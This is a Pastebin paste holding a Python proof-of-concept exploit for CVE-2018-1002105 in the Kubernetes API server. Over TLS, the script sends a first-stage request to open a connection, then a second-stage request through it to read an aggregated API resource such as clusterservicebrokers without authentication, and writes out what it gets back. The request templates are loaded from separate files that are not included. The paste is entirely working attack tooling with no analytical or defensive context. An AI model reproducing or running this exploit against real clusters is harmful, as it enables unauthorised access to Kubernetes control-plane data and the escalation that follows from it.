Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- import argparse
- from ssl import wrap_socket
- from json import loads, dumps
- from socket import create_connection
- def request_stage_1(base, version, target):
- stage_1 = ""
- with open('ustage_1', 'r') as stage_1_fd:
- stage_1 = stage_1_fd.read()
- return stage_1.format(base, version, target
- ).encode('utf-8')
- def request_stage_2(base, version, target_api, target):
- stage_2 = ""
- with open('ustage_2', 'r') as stage_2_fd:
- stage_2 = stage_2_fd.read()
- return stage_2.format(base, version, target_api, target,
- ).encode('utf-8')
- def read_data(ssock):
- data = []
- data_incoming = True
- while data_incoming:
- data_in = ssock.recv(4096)
- if not data_in:
- data_incoming = False
- elif data_in.find(b'\n\r\n0\r\n\r\n') != -1:
- data_incoming = False
- offset_1 = data_in.find(b'{')
- offset_2 = data_in.find(b'}\n')
- if offset_1 != -1 and offset_2 != -1:
- data_in = data_in[offset_1-1:offset_2+1]
- elif offset_1 != -1:
- data_in = data_in[offset_1-1:]
- elif offset_2 != -1:
- data_in = data_in[:offset_2-1]
- data.append(data_in)
- return data
- def run_exploit(target, stage_1, stage_2, filename, json):
- host, port = target.split(':')
- with create_connection((host, port)) as sock:
- with wrap_socket(sock) as ssock:
- print('[*] Building pipe ...')
- ssock.send(stage_1)
- data_in = ssock.recv(15)
- if b'HTTP/1.1 200 OK' in data_in:
- print('[+] Pipe opened :D')
- read_data(ssock)
- else:
- print('[-] Not sure if this went well...')
- print(f"[*] Attempting to access url")
- ssock.send(stage_2)
- data_in = ssock.recv(15)
- if b'HTTP/1.1 200 OK' in data_in:
- print('[+] Pipe opened :D')
- data = read_data(ssock)
- return data
- def parse_output(data, json, filename):
- if json:
- j = loads(''.join(i.decode('utf-8')
- for i in data))
- data = dumps(j, indent=4)
- if filename:
- mode = 'w+'
- else:
- mode = 'wb+'
- if filename:
- print(f"[*] Writing output to {filename} ....")
- with open(filename, mode) as fd:
- if json:
- fd.write(data)
- else:
- for msg in data:
- fd.write(msg)
- print('[+] Done!')
- else:
- if json:
- print(data)
- else:
- print(''.join(msg.decode('unicode_escape') for msg in data))
- def main():
- parser = argparse.ArgumentParser(description='Unauthenticated PoC for'
- ' CVE-2018-1002105')
- required = parser.add_argument_group('required arguments')
- optional = parser.add_argument_group('optional arguments')
- required.add_argument('--target', '-t', dest='target', type=str,
- help='API server target:port', required=True)
- required.add_argument('--api-base', '-b', dest='base', type=str,
- help='Target API name i.e. "servicecatalog.k8s.io"',
- default="servicecatalog.k8s.io")
- required.add_argument('--api-target', '-u', dest='target_api', type=str,
- help='API to access i.e. "clusterservicebrokers"',
- default="clusterservicebrokers")
- optional.add_argument('--api-version', '-a', dest='version', type=str,
- help='API version to use i.e. "v1beta1"',
- default="v1beta1")
- optional.add_argument('--json', '-j', dest='json', action='store_true',
- help='Print json output', default=False)
- optional.add_argument('--filename', '-f', dest='filename', type=str,
- help='File to save output to', default=False)
- args = parser.parse_args()
- if args.target.find(':') == -1:
- print("f[-] invalid target {args.target}")
- return False
- stage1 = request_stage_1(args.base, args.version, args.target)
- stage2 = request_stage_2(args.base, args.version, args.target_api,
- args.target)
- output = run_exploit(args.target, stage1, stage2, args.filename, args.json)
- parse_output(output, args.json, args.filename)
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
